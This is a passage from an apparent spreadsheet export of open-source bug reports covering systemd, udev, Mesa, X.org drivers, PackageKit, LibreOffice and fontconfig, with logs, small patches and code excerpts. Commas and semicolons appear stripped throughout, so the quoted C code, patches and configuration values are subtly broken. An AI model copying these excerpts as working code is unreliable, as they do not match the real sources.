I had to use strace and then examine both the  and the systemd source in order to figure out this was due to me not compiling in comprehensive namespace support into my kernel.
Here is a patch that gives a more helpful error message for others that may compile their own kernel or for other reasons end up with a kernel that can't run systemd-nspawn due to lack of CONFIG_*_NS features.
-Shawn</t>
  </si>
  <si>
    <t>shawnlandden</t>
  </si>
  <si>
    <t>SYSTEMD-82347</t>
  </si>
  <si>
    <t>RFE: honour gpio input device shutdown keypresses</t>
  </si>
  <si>
    <t>There are a couple of ARM-based server systems that use the gpio-keyboard and gpio-keyboard-polled drivers to send an event requesting a shutdown. The following rules DTRT though obviously it'd be nice if a more generic (but still safe) rule could be devised.
SUBSYSTEM==input KERNEL==event* SUBSYSTEMS==platform KERNELS==gpio-keys.6 PROGRAM=/bin/grep '^HP ProLiant m400 Server Cartridge$' /proc/device-tree/model TAG+=power-switch
SUBSYSTEM==input KERNEL==event* SUBSYSTEMS==platform KERNELS==gpio_keys.12 ATTRS{keys}==116 PROGRAM=/bin/cat /proc/device-tree/model RESULT==HP ProLiant m800 Server Cartridge TAG+=power-switch
You'll notice a couple of differences between the two. The m800 rule specifies a key attribute where the m400 rule does not. This is because the first uses a polled gpio via the gpio-keyboard-polled driver. This driver does not expose a keys attribute in sysfs. The m400 uses the gpio-keyboard driver which does.
You'll also notice the grep vs. cat/RESULT methods. Not sure if upstream has a preference.
It might make sense to drop the model/pin matching of the m800 rule and bind to any ATTR{keys}==116 - this is defined as KEY_POWER in . Of course that won't help the -polled variant.</t>
  </si>
  <si>
    <t>dannf</t>
  </si>
  <si>
    <t>CAIRO-4478</t>
  </si>
  <si>
    <t>cairo_public decorators break documentation build</t>
  </si>
  <si>
    <t>This is a known problem.
To reproduce: build documentation from the sources there will be a lot of
warnings and the documentation will lack (almost?) all function descriptions.
Further insight: gtk-doc has some strict regular expressions that don't accept 
cairo_public int  as a type for example which causes such declarations to be
ignored.</t>
  </si>
  <si>
    <t>bertram.felgenhauer</t>
  </si>
  <si>
    <t>XORG-57350</t>
  </si>
  <si>
    <t>[nouveau linux-3.7-rc] Broken cursor and kernel log swamped with trapped reads/writes from BAR/PFIFO_READ/FB</t>
  </si>
  <si>
    <t>On a MacBookAir with GeForce 9400M (C79) when X starts after booting (using Enlightenment with compositing) a horizontal bar in the middle of cursor (about 1/3 of cursor height) is transparent instead of showing cursor.
At the same time kernel log is being filled with following error:
nouveau E[     PFB][0000:02:00.0] trapped read at $addr on channel $fixed_addr BAR/PFIFO_READ/FB reason: PAGE_NOT_PRESENT
$fixed_addr is always the same (0x0000fee0) and $addr changes each time (e.g. 0x000040fe00 then 0x000040fe0c then 0x000040fe14 and continues incrementing)
Doing a suspend to ram and resume makes the cursor show correctly and error message not appearing anymore in kernel log.
Software versions:
 linux-3.7-rc5 linux-3.7-rc6
 xorg-server-1.13.0
 xf86-video-nouveau-1.0.4
 libdrm-2.4.40
 mesa-9.0
It was also the case with xorg-server-1.12.2 xf86-video-nouveau GIT snapshot from march 2012 libdrm-2.4.33 mesa-8.0.3) but did not happen with this setup with older kernel (linux-3.5.x not sure anymore about linux-3.6.x)</t>
  </si>
  <si>
    <t>PACKAGEKIT-101281</t>
  </si>
  <si>
    <t>Package fails when proxy is set.</t>
  </si>
  <si>
    <t>PackageKit(and anything that uses it) fails to work with a proxy.  This makes gnome-software unusable as well as all features that gnome tries to rely on for installing software when its needed (like drivers or codecs).  Manually running dnf works fine for updates or installing software.
For example:
$ pkcon refresh
Command failed: The proxy could not be set: GDBus.Error:org.gtk.GDBus.UnmappedGError.Quark._pk_2dengine_2derror_2dquark.Code3: setting the proxy failed: failed to get the session
Verbose logging reports this:
$ sudo killall packagekitd
$ sudo /usr/libexec/packagekitd --verbose
15:18:35	PackageKit          Verbose debugging enabled (on console 1)
15:18:35	PackageKit          daemon shutdown set to 0 seconds
15:18:35	PackageKit          setting config file watch on /etc/PackageKit/PackageKit.conf
15:18:35	PackageKit          Trying to load : dnf
15:18:35	PackageKit          dlopening '/usr/lib64/packagekit-backend/libpk_backend_dnf.so'
15:18:35	PackageKit-DNF      Using Dnf 0.8.0
15:18:35	PackageKit-DNF      Using librepo 1.7.20
15:18:35	PackageKit          trying to open database '/var/lib/PackageKit/transactions.db'
15:18:35	PackageKit          job count is now at 213
15:18:35	PackageKit          PkEngine: acquired name: org.freedesktop.PackageKit
15:18:58	PackageKit          SetProxy method called: http://10.0.0.1:8000/ ftp://10.0.0.1:2100
15:18:58	PackageKit          failed to get session errno -6
15:18:58	PackageKit          failed to get the session for :1.169
15:18:58	PackageKit          failed to get session errno -6
The following environment variables are set:
ftp_proxy=ftp://10.0.0.1:2100
http_proxy=http://10.0.0.1:8000/
https_proxy=http://10.0.0.1:8000/
no_proxy=localhost127.0.0.0/8::1172.29.131.110.0.0.0/24
rsync_proxy=10.0.0.1:8000
See redhat bug https://bugzilla.redhat.com/show_bug.cgi?id=1348843</t>
  </si>
  <si>
    <t>trevor.davenport</t>
  </si>
  <si>
    <t>ZEITGEIST-73268</t>
  </si>
  <si>
    <t>unnecessary warnings put in system log</t>
  </si>
  <si>
    <t>My system journal log has a ton of zeitgeist errors in it. I don't think some of them really need to be cluttering up the log at all and really don't need to be warnings in any case.
Jan 02 19:19:58 Quoll gnome-session[4976]: ** (zeitgeist-datahub:5390): WARNING **: zeitgeist-datahub.vala:103: GDBus.Error:org.freedesktop.DBus.Error.ServiceUnknown: The name org.gnome.zeitgeist.Engine was not provided by any .service files
Jan 02 19:19:58 Quoll gnome-session[4976]: (zeitgeist-datahub:5390): GLib-GObject-WARNING **: invalid (NULL) pointer instance
Jan 02 19:19:58 Quoll gnome-session[4976]: (zeitgeist-datahub:5390): GLib-GObject-CRITICAL **: g_signal_connect_data: assertion 'G_TYPE_CHECK_INSTANCE (instance)' failed
Jan 02 19:19:58 Quoll gnome-session[4976]: ** (zeitgeist-datahub:5390): WARNING **: zeitgeist-datahub.vala:153: GDBus
And tons of these:
Jan 03 15:31:12 Quoll gnome-session[4976]: ** (zeitgeist-datahub:5390): WARNING **: utils.vala:47: Couldn't get file contents /home/hendricks/.local/share/applications/epiphany-foursquare-fb75a35db897b926df6dd96a8b64d74b02f3af96.desktop: Error opening file: No such file or directory
That file is a broken link:
/home/hendricks/.local/share/applications/epiphany-foursquare-fb75a35db897b926df6dd96a8b64d74b02f3af96.desktop -&gt; /home/hendricks/.config/epiphany/app-epiphany-foursquare-fb75a35db897b926df6dd96a8b64d74b02f3af96/epiphany-foursquare-fb75a35db897b926df6dd96a8b64d74b02f3af96.desktop
Probably doesn't need to be a warning.</t>
  </si>
  <si>
    <t>MESA-110404</t>
  </si>
  <si>
    <t>Drivers/Gallium/Iris</t>
  </si>
  <si>
    <t>Iris fails piglit.spec.ext_transform_feedback.immediate-reuse test</t>
  </si>
  <si>
    <t>I found that the OpenGL saying:
OpenGL spec:
   5.3.3 Rules
    .......
    Note: â€œUpdatesâ€ via rendering or transform feedback
    are treated consistently with updates via GL commands.
    Once EndTransformFeedback has been issued any subsequent
    command in the same context that uses the results of the
    transform feedback operation will see the results.
i965 makes the several cache invalidations (VF L3 ...)
in EndTransformFeedback function to make the streamout result visible for others
but unfortunately Iris doesn't do it.
I will provide a solution for this issue shortly.</t>
  </si>
  <si>
    <t>XORG-2144</t>
  </si>
  <si>
    <t>MCLK and SCLK values miscalculated</t>
  </si>
  <si>
    <t>In absence of an x86 BIOS the driver tries to calculate the values for MCLK and
SCLK (since my patches). However the formula I used fails to take into account
a factor of 2 that has to be applied on one of the deviders thus causing the
clocks to be underestimated. Enclosed is a fix for it now the clocks
calculated by X do match the values advertised by Open Firmware.</t>
  </si>
  <si>
    <t>MESA-96398</t>
  </si>
  <si>
    <t>[radeonsi tessellation] Single-pixel rasterization issue (Shadow of Mordor)</t>
  </si>
  <si>
    <t>GPU: R9 390
Mesa 12.1.0-devel (git-be365f3)
Please see the screenshots attached to this issue.</t>
  </si>
  <si>
    <t>POPPLER-3387</t>
  </si>
  <si>
    <t>line wrong rendered</t>
  </si>
  <si>
    <t>In the attached image you have a comparision on how evince (with poppler 0.3.2 &amp;
cairo 0.5.0) and gpdf render a line. I'm afraid that poppler is wrong. BTW the
displayed document is located at
http://www.tug.org/pracjourn/2005-2/flynn/flynn.pdf.</t>
  </si>
  <si>
    <t>SYSTEMD-70665</t>
  </si>
  <si>
    <t>/dev/uinput belongs to subsystem misc not input</t>
  </si>
  <si>
    <t>In /usr/lib/udev/rules.d/50-udev-default.rules there is a rule that says
  SUBSYSTEM==input KERNEL==ts[0-9]*|uinput MODE=0640
Still my /dev/uinput shows up with mode 0600.  After some confusion on my part I found this Gentoo thread: http://forums.gentoo.org/viewtopic-t-951834-start-0.html which explains that uinput belongs to the subsystem misc rather than input.  Testing the udevadm command suggested in the thread that is equally true on my Fedora system as expected.
From what I can understand this is a bug in the udev rules file.  And that file belongs to the systemd package (systemd-208-2.fc20.x86_64.rpm) why I guess this is the correct place to report.</t>
  </si>
  <si>
    <t>goeran</t>
  </si>
  <si>
    <t>GALAGO-3782</t>
  </si>
  <si>
    <t>libgalago-gtk</t>
  </si>
  <si>
    <t>libgalago-gtk 0.3.2 failes to compile because it deps on gtk+ 2.7/2.8</t>
  </si>
  <si>
    <t>i686-pc-linux-gnu-gcc -O3 -march=pentium-m -fomit-frame-pointer -pipe -Wall -o
.libs/test-presence-icon test-presence-icon.o 
../libgalago-gtk/.libs/libgalago-gtk.so /usr/lib/libgtk-x11-2.0.so
/usr/lib/libgdk-x11-2.0.so /usr/lib/libatk-1.0.so /usr/lib/libgdk_pixbuf-2.0.so
-lm /usr/lib/libpangoxft-1.0.so /usr/lib/libpangox-1.0.so
/usr/lib/libpango-1.0.so /usr/lib/libgobject-2.0.so /usr/lib/libgmodule-2.0.so
-ldl /usr/lib/libgalago.so /usr/lib/libdbus-glib-1.so /usr/lib/libdbus-1.so
/usr/lib/libglib-2.0.so
../libgalago-gtk/.libs/libgalago-gtk.so: undefined reference to
`gtk_dialog_get_response_for_widget'
If you click the link it shows that you need GTK+ 2.8 which isn't even released
yet.
Any chance you can switch this to some other code that requires a lower dep?
Even 2.6 would be fine.</t>
  </si>
  <si>
    <t>MESA-35942</t>
  </si>
  <si>
    <t>Crash in World of Warcraft</t>
  </si>
  <si>
    <t>World of Warcraft is crashing again after a few minutes fishing in Dalaran's fountain.
After reverting as far back as:
commit 381d32af74e305041b5e75930a32795db94e0e15
Author: Tom Stellard 
Date:   Sat Apr 2 23:14:12 2011 -0700
   Revert r300/compiler: Remove obsolete compiler passes
   This reverts commit 9f013a8233197d4a0482661cb37cfeac1a61b804.
   These passes are still need for non-GLSL paths like g3dvl and ARB
   programs.
I was able to fish in Dalaran's fountain for several hours although the crash was still present when I'd only reverted as far back as:
commit 437c748bf5072d2bded77a00c74c51cdb8b510e5
In between these two commits is c35572352e3e92683988ee8d151b47f4190d62f9 which I have not tested.</t>
  </si>
  <si>
    <t>XORG-8790</t>
  </si>
  <si>
    <t>radeon driver apparently gets clocks wrong</t>
  </si>
  <si>
    <t>I've been fighting with the radeon driver in the new Fedora Core 6 release
and the same hardware I had back in bug 7243. The symptoms this time:
In the X log file where the radeon driver is printing all the info about
video modes it claims the 1920x1080 mode info results in 66.6 Khz vertical
and 59.9 Hz horizontal. Those numbers would be swell if they matched the
signal actually fed to the monitor unfortunately the monitor tells me
(when it is able to work) that the signal it is getting is 68K vertical
and 61 horizontal.
The symtoms I see are the monitor blanking then unblanking then blanking
etc. This goes on for a while and it either decides to cutoff completely
or if I'm lucky decides to stay on (but if I power off the monitor and come
back later it will probably start the cutting on and off again).
I notice a Windows box connected to the same monitor running off the same
DDC info provided to a radeon card produces a signal that the monitor
claims is 66k vertical and 59 horizontal and is rock solid - no flickering
on and off.
All the details of which versions of drivers and X log files and wot-not no
doubt need to be attached to this bug but I can't do that till I get home
later today.
Just thought I'd go ahead and get this in the system and maybe someone might
recognize the problem.
Also if anyone can tell me how the heck to defeat all the wonderful new
fully self configuring stuff and make it go back to just using the mode line
I provide that could be helpful as well since I might be able to manually
configure it to work (I don't think any mode I could manually generate could
do any more harm than constant turning on and off that I get now anyway :-).
The mode line reported in the log file is identical to the mode line I
provided manually with the older versions of X in previous fedora releases
(just copied from the info that showed up in the log but wasn't applied
automagically like it is now) and I may have seen the signal cutout once
every few months but not constantly like now so something different is
happening to the numbers in this new driver by the time they generate
an actual signal on the DVI port.</t>
  </si>
  <si>
    <t>horsley1953</t>
  </si>
  <si>
    <t>TELEPATHY-24422</t>
  </si>
  <si>
    <t>Account removal should be represented by TELEPATHY_QT4_ERROR_OBJECT_REMOVED</t>
  </si>
  <si>
    <t>Now that we have the error code TELEPATHY_QT4_ERROR_OBJECT_REMOVED Tp::Account::onRemoved() should use it instead of CANCELLED. Tp::Account's doxygen should explicitly say which error will be used.
(This mirrors similar code in telepathy-glib.)
This would be good to have before 0.2.</t>
  </si>
  <si>
    <t>MESA-100242</t>
  </si>
  <si>
    <t>radeon buffer allocation failure during startup of Factorio</t>
  </si>
  <si>
    <t>Created attachment 130277
terminal output when running the executable
The game Factorio crashes during startup with the following message printed on the CLI:
radeon: Failed to allocate a buffer:
radeon:    size      : 268435456 bytes
radeon:    alignment : 16384 bytes
radeon:    domains   : 4
radeon:    flags     : 20
The crash occurs during the pre-game loading procedure before reaching the main menu at the same spot every time. I'm on Lubuntu 16.10 using the up-to-date drivers provided by https://launchpad.net/~oibaf/+archive/ubuntu/graphics-drivers  my GPU is a Radeon HD 4670 with AGP. I believe this is a driver issue since the game starts up normally with 16.10's default drivers (12.0.6). I unfortunately cannot provide a specific date or build for when this behavior started occurring but it has been happening for several months.
Of note is that the demo version provided by the developer on their website does not have this problem and starts up fine.
Attached are the terminal output an strace and a gdb bt log.</t>
  </si>
  <si>
    <t>tnmailinglists</t>
  </si>
  <si>
    <t>LIBREOFFICE-79161</t>
  </si>
  <si>
    <t>Sidebar Crashes LO when deactivated from 'View' menu</t>
  </si>
  <si>
    <t>Steps to Replicate:
1. Start LO if the sidebar is visible deactivate from 'View' menu and exit and restart LO.
2. Open new writer document and activate sidebar from 'view' menu
3. select the gallery icon in the sidebar and click on one piece of clipart.
4. deactivate the sidebar from 'View' menu and LO crashes.
Additional information:
Also happens with Calc Impress &amp; Draw
no crash in 4.2.4.2
Ubuntu 14.04 64bit
Version: 4.3.0.0.beta1
Build ID: 2e39c7e59c8fc8b16a54c3d981dceef27fb0c07f
Version: 4.2.4.2
Build ID: 63150712c6d317d27ce2db16eb94c2f3d7b699f8</t>
  </si>
  <si>
    <t>DRI-88786</t>
  </si>
  <si>
    <t>Radeon Hawaii crash on a 32-bit kernel</t>
  </si>
  <si>
    <t>Created attachment 112799
dmesg booted with drm.debug
The new MSI Hawaii board used single or 2-headed.
The crash in 
[    5.654006] kernel BUG at drivers/gpu/drm/radeon/radeon_sa.c:321!
[    5.654008] invalid opcode: 0000 [#1] PREEMPT SMP 
The crash is 100% repeatable. The system will boot OK to X with radeon.modeset=0.
The kernel has added trace to verify the firmware requested.
Unclear about 64-bit behavior since I am booting a live USB distro.
Distro based on Debian Jessie with
X.Org X Server 1.16.2.901 (1.16.3 RC 1)
Release Date: 2014-12-09</t>
  </si>
  <si>
    <t>MESA-26722</t>
  </si>
  <si>
    <t>dead code src/mesa/drivers/common/meta.c:2134</t>
  </si>
  <si>
    <t>mesa: e16f0c14f353cc04ad6cbcf99e3b95ccb1d2c06b (master)
target == GL_TEXTURE_3D on line 2134 can never be true due to the early check at line 2112.
src/mesa/drivers/common/meta.c
  2100  GLboolean
  2101  _mesa_meta_check_generate_mipmap_fallback(GLcontext *ctx GLenum target
  2102                                            struct gl_texture_object *texObj)
  2103  {
  2104     const GLuint fboSave = ctx-&gt;DrawBuffer-&gt;Name
  2105     struct gen_mipmap_state *mipmap = 
  2106     struct gl_texture_image *baseImage
  2107     GLuint srcLevel
  2108     GLenum status
  2109  
  2110     /* check for fallbacks */
  2111     if (!ctx-&gt;Extensions.EXT_framebuffer_object ||
-&gt;2112         target == GL_TEXTURE_3D) {
  2113        return GL_TRUE
  2114     }
  2115  
  2116     srcLevel = texObj-&gt;BaseLevel
  2117     baseImage = _mesa_select_tex_image(ctx texObj target srcLevel)
  2118     if (!baseImage || _mesa_is_format_compressed(baseImage-&gt;TexFormat)) {
  2119        return GL_TRUE
  2120     }
  2121  
  2122     /*
  2123      * Test that we can actually render in the texture's format.
  2124      */
  2125     if (!mipmap-&gt;FBO)
  2126        _mesa_GenFramebuffersEXT(1 
  2127     _mesa_BindFramebufferEXT(GL_FRAMEBUFFER_EXT mipmap-&gt;FBO)
  2128  
  2129     if (target == GL_TEXTURE_1D) {
  2130        _mesa_FramebufferTexture1DEXT(GL_FRAMEBUFFER_EXT
  2131                                      GL_COLOR_ATTACHMENT0_EXT
  2132                                      target texObj-&gt;Name srcLevel)
  2133     }
-&gt;2134     else if (target == GL_TEXTURE_3D) {
  2135        GLint zoffset = 0
  2136        _mesa_FramebufferTexture3DEXT(GL_FRAMEBUFFER_EXT
  2137                                      GL_COLOR_ATTACHMENT0_EXT
  2138                                      target texObj-&gt;Name srcLevel zoffset)
  2139     }
  2140     else {
This is from commit c8413351c33d5758da057b56a140c9ee622a5e4a.</t>
  </si>
  <si>
    <t>XORG-64912</t>
  </si>
  <si>
    <t>[glamor] segfault in miTrapezoidBounds()</t>
  </si>
  <si>
    <t>Created attachment 79701
Xorg backtrace
With glamor acceleration enabled X server segfaults when I'm trying to open context menu of any message in message list in Claws Mail. No problems with EXA.
Hardware:
- HD 7750 (VERDE)
- HD 6450 (CAICOS)
Software:
- mesa-9.2 Git
- llvm-3.4 Git
- xorg-server-1.13.4
- xf86-video-ati-7.1.0
- glamor Git
- libdrm-2.4.45
- linux-3.8.12</t>
  </si>
  <si>
    <t>junyan.he</t>
  </si>
  <si>
    <t>MESA-92221</t>
  </si>
  <si>
    <t>Unintended code changes in _mesa_base_tex_format commit</t>
  </si>
  <si>
    <t>Commit c6bf1cd1467ea5d5370394ba99366dd8a59a385c was supposed to move _mesa_base_tex_format() from one file to another but it also adds extra code into the function and removes a case which handles ASTC formats.</t>
  </si>
  <si>
    <t>DRI-19628</t>
  </si>
  <si>
    <t>[KMS] [855GM] Computer freezes with garbled screen regression of 2.6.29-rc1-&gt;rc2</t>
  </si>
  <si>
    <t>When starting X the computer locks up with a garbled screen. I will attach a picture of it. The screen also flashes at a high frequenzy. I cannot get the computer to respond in anyway other than shutting it off with the button (holding for a few seconds). 
This only happens when booting the kernel i915.modeset=1. Without KMS everything works as expected.
Hardware is a IBM Thinkpad R51 with 855GM.
00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)
00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)
Software:
kernel-2.6.29-rc2
xf86-video-intel-2.6.0
libdrm-2.4.3
xorg-server-1.5.99.901
mesa-7.3_rc2
With kernel version 2.6.29-rc1 this does not happen (there are other problems but i could still start X).</t>
  </si>
  <si>
    <t>un_aimed</t>
  </si>
  <si>
    <t>XORG-22727</t>
  </si>
  <si>
    <t>HDMI audio enabled even though not supported confuses TV</t>
  </si>
  <si>
    <t>Created attachment 27600
Xorg log
Hi
I'm running an Eee Box B206 with an integrated Radeon HD 3450 connected to a Samsung LCD TV.
Since the radeon driver doesn't support audio through HDMI I've connected an audio cable separately from the computer's sound card. This works fine until I start X -- then the audio stops. Well the audio is still coming out from the line out but the TV thinks that audio should come through HDMI and doesn't care about the cable.
Apparently the radeon driver is telling the TV that it supports audio even though it doesn't. The radeonhd driver does not have this problem (but I can't use it because I need Xv). Also if I switch VC to text mode audio comes back. It disappears as soon as I switch back to X.
xrandr reports the output as DVI-0.
I'm running Debian with Xorg 7.4 Xserver 1.6.1.901 and latest xf86-video-ati from git (76af48c43f829e7aebacc9f2a623823fa26ee22b).
Attaching Xorg log.</t>
  </si>
  <si>
    <t>XORG-30717</t>
  </si>
  <si>
    <t>Problems when switching keyboard layout in ubuntu 10.10 RC</t>
  </si>
  <si>
    <t>I'm using ubuntu 10.10 RC and I have a strange problem when switching keyboard layout between English and Persian. When choosing either US or Iranian layouts the characters are alternately English and Persian! I mean one letter is typed in English and another in Persian. If I delete and type again it types correctly.
I'm using xorg version 1:7.5+6ubuntu3 and my friends are reporting similar problems.</t>
  </si>
  <si>
    <t>mah.fat</t>
  </si>
  <si>
    <t>FONTCONFIG-8565</t>
  </si>
  <si>
    <t>compile failure for 2.4.1 on solaris 10 with gcc</t>
  </si>
  <si>
    <t>compiling fontconfig 2.4.1 on solaris 10 using the gcc3.4 from /usr/sfw
fails with:
 ld: fatal: relocation error: R_386_GOTOFF: file .libs/fccache.o: symbol  
FcDebugVal: relocation must bind locally
 collect2: ld returned 1 exit status
This patch fixes build:
--- src/fcint.h.orig    2006-10-09 23:26:05.064812000 +1300
+++ src/fcint.h
@@ -1117 +1117 @@
 #define FC_BANK_LANGS      0xfcfcfcfc
 /* slim_internal.h */
-#if (__GNUC__ &gt; 3 || (__GNUC__ == 3 &amp;&amp; __GNUC_MINOR__ &gt;= 3)) &amp;&amp; 
defined(__ELF__)
+#if (__GNUC__ &gt; 3 || (__GNUC__ == 3 &amp;&amp; __GNUC_MINOR__ &gt;= 3)) &amp;&amp; 
defined(__ELF__) &amp;&amp; !defined(__sun)
 #define FcPrivate              __attribute__((__visibility__(hidden)))
 #define HAVE_GNUC_ATTRIBUTE 1
 #include fcalias.h</t>
  </si>
  <si>
    <t>UDISKS-54828</t>
  </si>
  <si>
    <t>luks</t>
  </si>
  <si>
    <t>udisks currently doesn't support providing a key file for luks</t>
  </si>
  <si>
    <t>'udisksctl unlock' currently doesn't support providing a keyfile in the command line to unlock the disk. 
See the thread with the subject udisksctl unlock parameter for keyfiles on the devkit-devel@lists.freedesktop.org list for more details.</t>
  </si>
  <si>
    <t>sfischme</t>
  </si>
  <si>
    <t>MESA-29628</t>
  </si>
  <si>
    <t>[swrast] glean glsl1 '2D Texture lookup with explicit lod (Vertex shader)' regression</t>
  </si>
  <si>
    <t>mesa: 8f5f44c9c8fa59e36efdf1acf3543ad81cb865d5 (master)
glean glsl1 '2D Texture lookup with explicit lod (Vertex shader)' now fails but previously passed.
The regression was introduced with the glsl2 branch merge.
$ GLSL_TEST=2D Texture lookup with explicit lod (Vertex shader) glean -results -t glsl1
glsl1: Running single test: 2D Texture lookup with explicit lod (Vertex shader)
Mesa 7.9-devel implementation error: Bad opcode 84 in _mesa_execute_program
Please report at bugzilla.freedesktop.org
Mesa 7.9-devel implementation error: Bad opcode 84 in _mesa_execute_program
Please report at bugzilla.freedesktop.org
Mesa 7.9-devel implementation error: Bad opcode 84 in _mesa_execute_program
Please report at bugzilla.freedesktop.org
Mesa 7.9-devel implementation error: Bad opcode 84 in _mesa_execute_program
Please report at bugzilla.freedesktop.org
FAILURE:
  Shader test: 2D Texture lookup with explicit lod (Vertex shader)
  Expected color: 0.25 0 0 0.25
  Observed color: 0 0 0 1
glsl1:  FAIL rgb8 db z16 s8 accrgba16 win+pmap id 33
	0 tests passed 1 tests failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-47941</t>
  </si>
  <si>
    <t>EDITING group boundaries are stuck moving rows out of a group</t>
  </si>
  <si>
    <t>Hi.
This is a new bug (since version 3.5.1.2?):
1) Fill A1:A10 with some data
   say A1 = 1 A2 = 2 .. A10 = 10
2) Group rows 3..5 with F12
3) Mark row 4 to be moved later
4) Alt-Drag cell A4 with the left muse button
   far out of the group say to row 20.
5) WRONG result:
   The group still occupies lines 3 .. 5 but it should
   hold now rows 3 and 4.
   A5 now holds the number 6 which didn't belong
   to the group initially.
I work a lot with grouping / outline F12 / Ctrl-F12
and I've to switch between OpenOffice at work and LibreOffice
at home. The same files are edited with different versions of
OOo LO.
Now I've found that my files will be corrupted with LibreOffice 3.5.1.2.
(Build ID: 350m1 (Build: 102).
Thanks
   Andreas</t>
  </si>
  <si>
    <t>andreas.wehler</t>
  </si>
  <si>
    <t>PACKAGEKIT-17236</t>
  </si>
  <si>
    <t>Fix for pk-action-refresh-cache icon</t>
  </si>
  <si>
    <t>The 3rd frame of the pk-action-refresh-cache seems to have a darker shadow than the rest. I have hopefully fixed this (not tested).</t>
  </si>
  <si>
    <t>DRI-101824</t>
  </si>
  <si>
    <t>Opensuse Intel HD4600 System is froze randomly for 1 minute</t>
  </si>
  <si>
    <t>Created attachment 132740
dumped error details
this is the logged error:
Jul 17 22:54:12 linux-2kv0 kernel: [drm] GPU HANG: ecode 7:0:0xf3cffffe in plasmashell [2195] reason: Hang on render ring action: reset
Jul 17 22:54:12 linux-2kv0 kernel: [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
Jul 17 22:54:12 linux-2kv0 kernel: [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
Jul 17 22:54:12 linux-2kv0 kernel: [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
Jul 17 22:54:12 linux-2kv0 kernel: [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
Jul 17 22:54:12 linux-2kv0 kernel: [drm] GPU crash dump saved to /sys/class/drm/card0/error
Jul 17 22:54:12 linux-2kv0 kernel: drm/i915: Resetting chip after gpu hang</t>
  </si>
  <si>
    <t>adrian.breban</t>
  </si>
  <si>
    <t>LIBREOFFICE-70483</t>
  </si>
  <si>
    <t>FILEOPEN: Aborts when opening malformed DOC files</t>
  </si>
  <si>
    <t>Created attachment 87657
files that can be used to reproduce the crash
Problem description: 
terminate called after throwing an instance of 'std::bad_alloc'
  what():  std::bad_alloc
Program received signal SIGABRT Aborted.
0x0000003001835329 in __GI_raise (sig=sig@entry=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	  return INLINE_SYSCALL (tgkill 3 pid selftid sig)
Attached you can find an archive that contains several sample files that can be used to reproduce the problem.
The files were generated by fuzzing valid files in order to check for problems when libreoffice handles malformed input.
The bug was found while testing Libreoffice version 4.0.1.2 but it is persistent in version 4.1.2.3
Steps to reproduce:
1. Open libreoffice with gdb attached
2. Open the files from the attached archive
A gdb backtrace example of opening one of the files can be found here:
https://docs.google.com/file/d/0Bw_O6opVYHaaSzFTV2gwMWtxR2M/edit?usp=sharing
Operating System: Ubuntu
Version: 4.1.2.3 rc</t>
  </si>
  <si>
    <t>Ioan-alexandru.blanda</t>
  </si>
  <si>
    <t>DRI-105064</t>
  </si>
  <si>
    <t>GPU Hang with single-channel RAM configuration</t>
  </si>
  <si>
    <t>Mesa CI consistently reproduced GPU hangs on a subset of BDWGT3e machines after updating kernel from 4.9-&gt;4.15.
On further investigation we found that all failing machines had RAM in single-channel configuration:  4GB in each of slots A1 A2.  This is a valid (though uncommon) memory configuration.
We have not yet verified if other more common memory configurations (3 slots 4 slots filled) reproduce the hang.
So far this is reproducible as far back as 4.13 by running piglit in a loop a few times.</t>
  </si>
  <si>
    <t>DBUS-36811</t>
  </si>
  <si>
    <t>memory leak when objects are automatically unregistered</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #36793 +++
If you do this:
* create a GObject
* export it on D-Bus (at n &gt;= 1 object paths)
* unref the object enough times that it is freed
there should be no leak.
What actually happens is:
* each object registration o has a weak ref which results in a
  call to object_registration_object_died
* object_registration_object_died sets o-&gt;object to NULL
* object_registration_object_died calls dbus_connection_unregister_object_path
* this results in a call to object_registration_unregistered
* which calls object_registration_free
* which does not remove the dbus_glib_object_registrations qdata
  from the object because the object has already been freed at this point
  so it's too late (and also because o-&gt;object is NULL)
Because the object registrations are already qdata we shouldn't really need a weak ref at all...</t>
  </si>
  <si>
    <t>FONTCONFIG-9678</t>
  </si>
  <si>
    <t>Please ship man1 pages</t>
  </si>
  <si>
    <t>fontconfig ships almost all the docs in the tarball.  Missing are man pages for
commandline tools.
We have to disable doc building in fedora packaging for good reasons.  I can do
that by export USEDOCBOOK=no but then I don't get the man1 pages.  Please
include those too.</t>
  </si>
  <si>
    <t>GTK-QT_ENGINE-4651</t>
  </si>
  <si>
    <t>x86_64 fix: removes hardcoded use of $(KDE_PREFIX)/lib</t>
  </si>
  <si>
    <t>Here's a small patch against gtk-qt-0.6 that removes the hard-coded use of
$(KDE_PREFIX)/lib to allow for $(KDE_PREFIX)/lib64 on x86_64 systems.
--- kcm_gtk/Makefile.am
+++ kcm_gtk/Makefile.am
@@ -19 +17 @@
 INCLUDES    = $(all_includes)
 METASOURCES = AUTO
-# Install this plugin in the KDE modules directory
-kcmgtkmoduledir = $(KDE_PREFIX)/lib/kde3/
-kcmgtkmodule_LTLIBRARIES = kcm_kcmgtk.la
+kde_module_LTLIBRARIES = kcm_kcmgtk.la
 kcm_kcmgtk_la_SOURCES = kcmgtkwidget.ui kcmgtk.cpp
 kcm_kcmgtk_la_LIBADD = $(LIB_KDEUI)</t>
  </si>
  <si>
    <t>DRI-109217</t>
  </si>
  <si>
    <t>clock management is disabled for the 4K resolution with polaris 10</t>
  </si>
  <si>
    <t>Created attachment 142962
Simple python app for monitoring and changing the engine clock
When the Xfce desktop is visible at 4K and idling the engine clock is fixed at level 6: 1220MHz and you can not change that. The temperature is 38 C. The automatic power management works with 2560x1600 and lower resolutions. I tested with my python app and I have latest drivers including firmware files. My monitor is ASUS VP28UQG and I use the display port.
Adding amdgpu.ppfeaturemask=0xffffffff to the kernel command line makes the powerplay feature to work normally at 4K.
System:
  Host: ryzenpc Kernel: 4.20.0-rc4+ x86_64 bits: 64 Desktop: Xfce 4.12.4 
  Distro: Debian GNU/Linux buster/sid 
Machine:
  Type: Desktop Mobo: ASUSTeK model: PRIME B350M-K v: Rev X.0x 
  serial:  UEFI [Legacy]: American Megatrends v: 4207 
  date: 12/07/2018 
CPU:
